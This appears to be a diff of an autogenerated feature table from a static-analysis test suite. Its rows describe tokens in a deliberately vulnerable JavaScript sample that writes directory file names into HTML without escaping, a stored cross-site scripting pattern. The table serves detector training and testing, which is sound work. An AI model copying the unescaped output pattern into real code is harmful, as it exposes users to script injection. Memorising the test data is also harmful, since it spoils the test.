    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:19 | files2.sort | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:19 | files2.sort | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | exceptional return of files2.sort(sort) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | exceptional return of files2.sort(sort) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | exceptional return of files2.sort(sort) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | exceptional return of files2.sort(sort) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | exceptional return of files2.sort(sort) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | files2.sort(sort) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | files2.sort(sort) | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | files2.sort(sort) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | files2.sort(sort) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:25 | files2.sort(sort) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:33 | files2. ... forEach | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:33 | files2. ... forEach | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:33 | files2. ... forEach | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:33 | files2. ... forEach | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:19:33 | files2. ... forEach | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | exceptional return of files2. ... }) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | exceptional return of files2. ... }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | exceptional return of files2. ... }) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | exceptional return of files2. ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | exceptional return of files2. ... }) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | files2. ... }) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | files2. ... }) | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | files2. ... }) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | files2. ... }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:9:21:10 | files2. ... }) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:16:19:19 | sort | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:16:19:19 | sort | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:16:19:19 | sort | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:16:19:19 | sort | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:16:19:19 | sort | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:21:19:24 | sort | CalleeFlexibleAccessPath | files2.sort | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:21:19:24 | sort | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:21:19:24 | sort | contextFunctionInterfaces | format(files2) | @@ -22396,6 +148892,31 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:21:19:24 | sort | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:21:19:24 | sort | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:21:19:24 | sort | receiverName | files2 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:27:19:33 | forEach | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:27:19:33 | forEach | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:27:19:33 | forEach | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:27:19:33 | forEach | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:27:19:33 | forEach | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | files3 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | files3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | files3 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | files3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | files3 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | this | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | this | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:19:34 | this | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | 'arguments' object of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | 'arguments' object of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | exceptional return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | exceptional return of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | exceptional return of anonymous function | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | functio ... } | CalleeFlexibleAccessPath | files2.sort().forEach | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | functio ... } | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | functio ... } | contextFunctionInterfaces | format(files2) | @@ -22403,6 +148924,46 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | functio ... } | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | functio ... } | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | functio ... } | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | return of anonymous function | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | return of anonymous function | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:35:21:9 | return of anonymous function | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | contextSurroundingFunctionParameters | (files2)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:19:45:19:48 | file | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:18 | files3 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:18 | files3 | contextSurroundingFunctionParameters | (files2)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:18 | files3 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:18 | files3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:18 | files3 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:23 | files3.push | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:23 | files3.push | contextSurroundingFunctionParameters | (files2)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:23 | files3.push | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:23 | files3.push | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:23 | files3.push | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | exceptional return of files3. ...

    • ') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | exceptional return of files3. ... ') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | exceptional return of files3. ... ') | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | exceptional return of files3. ... ') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | exceptional return of files3. ... ') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | files3. ... ') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | files3. ... ') | contextSurroundingFunctionParameters | (files2)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | files3. ... ') | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | files3. ... ') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:13:20:48 | files3. ... ') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:20:20:23 | push | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:20:20:23 | push | contextSurroundingFunctionParameters | (files2)\n(file) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:20:20:23 | push | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:20:20:23 | push | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:20:20:20:23 | push | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:25:20:30 | '
  • ' | contextFunctionInterfaces | format(files2) | | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:25:20:30 | '
  • ' | contextSurroundingFunctionParameters | (files2)\n(file) | | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:25:20:30 | '
  • ' | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | @@ -22434,6 +148995,31 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:41:20:47 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:41:20:47 | '' | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:20:41:20:47 | '' | stringConcatenatedWith | '
  • ' + file -endpoint- | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:21 | files3 | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:21 | files3 | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:21 | files3 | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:21 | files3 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:21 | files3 | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:26 | files3.join | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:26 | files3.join | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:26 | files3.join | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:26 | files3.join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:26 | files3.join | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | exceptional return of files3.join('') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | exceptional return of files3.join('') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | exceptional return of files3.join('') | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | exceptional return of files3.join('') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | exceptional return of files3.join('') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | files3.join('') | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | files3.join('') | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | files3.join('') | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | files3.join('') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:16:22:30 | files3.join('') | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:23:22:26 | join | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:23:22:26 | join | contextSurroundingFunctionParameters | (files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:23:22:26 | join | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:23:22:26 | join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:22:23:22:26 | join | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:28:22:29 | '' | CalleeFlexibleAccessPath | files3.join | | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:28:22:29 | '' | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:28:22:29 | '' | contextFunctionInterfaces | format(files2) | @@ -22442,6 +149028,31 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:28:22:29 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:28:22:29 | '' | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:22:28:22:29 | '' | receiverName | files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:6 | fs | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:6 | fs | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:6 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:6 | fs | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:14 | fs.readdir | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:14 | fs.readdir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:14 | fs.readdir | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:14 | fs.readdir | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:25:14 | fs.readdir | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | exceptional return of fs.read ... \\n }) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | exceptional return of fs.read ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | exceptional return of fs.read ... \\n }) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | exceptional return of fs.read ... \\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | exceptional return of fs.read ... \\n }) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | fs.read ... \\n }) | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | fs.read ... \\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | fs.read ... \\n }) | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | fs.read ... \\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:5:39:6 | fs.read ... \\n }) | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:8:25:14 | readdir | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:8:25:14 | readdir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:8:25:14 | readdir | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:8:25:14 | readdir | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:8:25:14 | readdir | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:16:25:23 | "/myDir" | CalleeFlexibleAccessPath | fs.readdir | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:16:25:23 | "/myDir" | InputArgumentIndex | 0 | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:16:25:23 | "/myDir" | calleeImports | fs | @@ -22451,6 +149062,36 @@ tokenFeatures | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:16:25:23 | "/myDir" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:16:25:23 | "/myDir" | fileImports | express fs http | | autogenerated/Xss/StoredXss/xss-through-filenames.js:25:16:25:23 | "/myDir" | receiverName | fs | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | format | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | format | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | format | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | format | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | res | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | res | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
    • files3 join fs readdir /myDir error files1 res write files1 dirs files2 files1 forEach file files2 push file res write files2 files3 format files2 res write files3 | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | res | fileImports | express fs http | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | this | contextFunctionInterfaces | format(files2) | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/StoredXss/xss-through-filenames.js:25:26:25:25 | this | enclosingFunctionBody | req res format files2 files3 files2 sort sort forEach file files3 push
  • file
